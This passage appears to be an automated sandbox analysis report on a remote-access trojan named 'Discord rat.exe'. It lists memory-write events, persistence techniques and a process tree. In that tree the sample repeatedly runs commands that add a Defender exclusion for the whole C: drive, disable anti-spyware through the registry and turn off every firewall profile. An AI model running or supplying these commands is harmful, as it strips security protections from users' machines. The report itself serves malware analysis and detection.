PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 1344	3544	Discord rat.exe	86
PID 3544 wrote to memory of 1344	3544	Discord rat.exe	86
PID 3544 wrote to memory of 3148	3544	Discord rat.exe	87
PID 3544 wrote to memory of 3148	3544	Discord rat.exe	87
PID 3544 wrote to memory of 1068	3544	Discord rat.exe	127
PID 3544 wrote to memory of 1068	3544	Discord rat.exe	127
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 1972	3544	Discord rat.exe	92
PID 3544 wrote to memory of 4396	3544	Discord rat.exe	93
PID 3544 wrote to memory of 4396	3544	Discord rat.exe	93
PID 3544 wrote to memory of 684	3544	Discord rat.exe	94
PID 3544 wrote to memory of 684	3544	Discord rat.exe	94
PID 3544 wrote to memory of 3008	3544	Discord rat.exe	95
PID 3544 wrote to memory of 3008	3544	Discord rat.exe	95
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 912	3544	Discord rat.exe	98
PID 3544 wrote to memory of 948	3544	Discord rat.exe	100
PID 3544 wrote to memory of 948	3544	Discord rat.exe	100
PID 3544 wrote to memory of 4484	3544	Discord rat.exe	101
PID 3544 wrote to memory of 4484	3544	Discord rat.exe	101
PID 3544 wrote to memory of 3564	3544	Discord rat.exe	102
PID 3544 wrote to memory of 3564	3544	Discord rat.exe	102
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 452	3544	Discord rat.exe	106
PID 3544 wrote to memory of 1340	3544	Discord rat.exe	107
PID 3544 wrote to memory of 1340	3544	Discord rat.exe	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b2c3120d-370e-4396-8ab9-a7b08f7bd9e4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3216
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ba1372c-159a-4bd7-a9d7-5248920bd668}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{de403d6f-b592-4f14-ac25-232a36263ab7}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:912
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{100d1262-3ff9-419b-b79b-72271e5f59f6}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:452
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{21639f9a-1988-4ea9-8520-f3db160af89b}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4340
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1a8155ee-2b6c-4bd0-85ad-bf9343c008b2}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4580
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{60dae277-616e-4890-8e11-c896bc2192a9}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1068
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5028fa0b-30b8-4bc1-9564-8b097da5d719}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4624
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e2de2402-7a3d-4dbb-84d8-f319eea6916e}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5660
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0a273f42-0341-40ea-8180-9e925074858e}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5992
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d86f331f-9e92-4d94-862e-8b9175a27552}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2908
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{425f0b8e-ae8e-4e6a-827b-1f6a7455879c}
  2⤵
  PID:6020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e9e2c5a1-698a-47b1-a4a9-ff14c7c2c7a5}
  2⤵
  PID:3968
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{306217ca-0361-45c4-a808-751015d232b3}
  2⤵
  PID:5320
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bb3af821-f9d4-44e0-933a-2b8704604f73}
  2⤵
  PID:6004
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{99ddc761-991e-489b-9be3-69ca56efa190}
  2⤵
  PID:5348
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ce54d3cc-91f4-4d78-a3b9-9119cc1434d8}
  2⤵
  PID:5824
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0f236a3d-0648-442d-b0c7-2fcae5330de5}
  2⤵
  PID:5352
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{16c4f18d-8721-43a4-8e0d-4bb19707ea9f}
  2⤵
  PID:948
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0fbf851a-aaa5-48b4-9760-740b8ea17444}
  2⤵
  PID:5560
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{003d6dab-1914-4e0a-9e56-1361eccd6fc3}
  2⤵
  PID:2824
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{be793e53-cdd8-48ca-8f27-922cce12edfb}
  2⤵
  PID:5684
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8873cab5-c391-4d09-bd7d-f8e2e0663eb9}
  2⤵
  PID:5784
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ce61453e-5320-44e2-8ec6-d030a6a2f825}
  2⤵
  PID:4652
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{de7c2445-9fa8-4826-868e-97b7761e3782}
  2⤵
  PID:2332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b9b57b2a-27f5-4bb5-94ec-facb468c9d9b}
  2⤵
  PID:6032
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5d67c547-4ac3-46ac-a81e-edd15cf3b62c}
  2⤵
  PID:6096
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{65bf38cc-106f-4601-9d68-17d2e7fcc40e}
  2⤵
  PID:3784
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{33c4a920-90e5-4f08-acb5-b721d336af6e}
  2⤵
  PID:7104
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8cd14e17-86e4-422b-a874-bce5e6e4ce54}
  2⤵
  PID:6972
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{517acc8d-0279-490f-a8e3-1b3597e8eb8c}
  2⤵
  PID:5592
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1bffadeb-349a-4b00-ba9c-25e9e9d97a93}
  2⤵
  PID:5520
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c89f6ee6-cbf3-483c-9466-146901ec1a1f}
  2⤵
  PID:2244
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{551af477-9c8c-4f27-bc4e-945a9e8d44c6}
  2⤵
  PID:4968
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b9079463-3569-4098-91fd-b937814c9f3e}
  2⤵
  PID:6472
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{025ab8ab-1716-4275-b5e2-6621482729c5}
  2⤵
  PID:6548
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{191d60e3-5075-473d-80e8-ebd874a2a2da}
  2⤵
  PID:5852
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{376d56ce-eef4-4cca-bc49-a175f2172d9c}
  2⤵
  PID:6968
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9ab6043a-3a9e-47f0-910a-f02b41989878}
  2⤵
  PID:6628
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f0dbb18e-02de-4f96-947a-726c0efa56c2}
  2⤵
  PID:4372
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4ccada4b-f945-4a72-b703-69d8c0f6b961}
  2⤵
  PID:1592
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{748c45f4-0fc0-4eef-a839-9a5bcbb2a7d1}
  2⤵
  PID:4000
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e500bfa3-d7aa-41d2-997d-84712dcefbe5}
  2⤵
  PID:5740
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{13e0d711-dee1-41f3-a481-7fb16d59feaf}
  2⤵
  PID:7220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{05fc15f3-af94-4321-af3e-9e0c7280e249}
  2⤵
  PID:7856
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{62ccefee-af32-4926-914a-efa9342415ce}
  2⤵
  PID:3932
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{832a4ed2-7421-4622-8829-dd829c67e6a1}
  2⤵
  PID:6940
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6eb7fdeb-e973-4f06-905d-c90252dfb7fe}
  2⤵
  PID:4120
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a1cad974-92ea-46a1-af05-9c704e8b6ee1}
  2⤵
  PID:3332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{987d8856-447b-473a-b0ea-3bfbbe3b9370}
  2⤵
  PID:6192
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{987d8856-447b-473a-b0ea-3bfbbe3b9370}
  2⤵
  PID:7472
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{825491e4-62ad-4b78-8358-0d406d95f794}
  2⤵
  PID:7668
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{825491e4-62ad-4b78-8358-0d406d95f794}
  2⤵
  PID:8036
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e8396ce1-e7e5-4dcd-9345-f4eb90028ab1}
  2⤵
  PID:6140
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9439b844-6614-4515-aa02-e2a8e95c82ba}
  2⤵
  PID:4132
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ab2f049d-3633-40fb-ba8a-6c86c3340035}
  2⤵
  PID:624
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c0914fae-db72-409f-ac99-e874808fb7e3}
  2⤵
  PID:4492
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:6712
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b3f9d89f-2c22-455a-b047-c8b8429d308d}
  2⤵
  PID:3312
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5806bdc8-7842-4bb1-aaa8-41ddcd43681a}
  2⤵
  PID:864
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0903911b-e99c-4424-9f98-6fa76d708602}
  2⤵
  PID:6240
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{07d5fb90-d5c5-4a93-959a-415e80c54963}
  2⤵
  PID:1112
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{aa6e7901-b7ad-442a-a994-26438a55a428}
  2⤵
  PID:5872
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{aa6e7901-b7ad-442a-a994-26438a55a428}
  2⤵
  PID:3224
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1fe36f0e-e294-4e1e-ab41-c22900a34bfe}
  2⤵
  PID:5764
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1fe36f0e-e294-4e1e-ab41-c22900a34bfe}
  2⤵
  PID:6788

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1152
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1416
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2036

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2788

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2868

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3524
- C:\Users\Admin\AppData\Local\Temp\Discord rat.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord rat.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3696
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3148
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4488
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1068
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4396
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1992
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:684
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:948
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4004
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4484
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3564
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1340
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3484
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3208
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2380
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1604
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5072
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:684
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2796
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1908
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:872
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2716
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4728
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3612
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5160
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5024
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5104
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:224
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2556
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5260
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4460
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
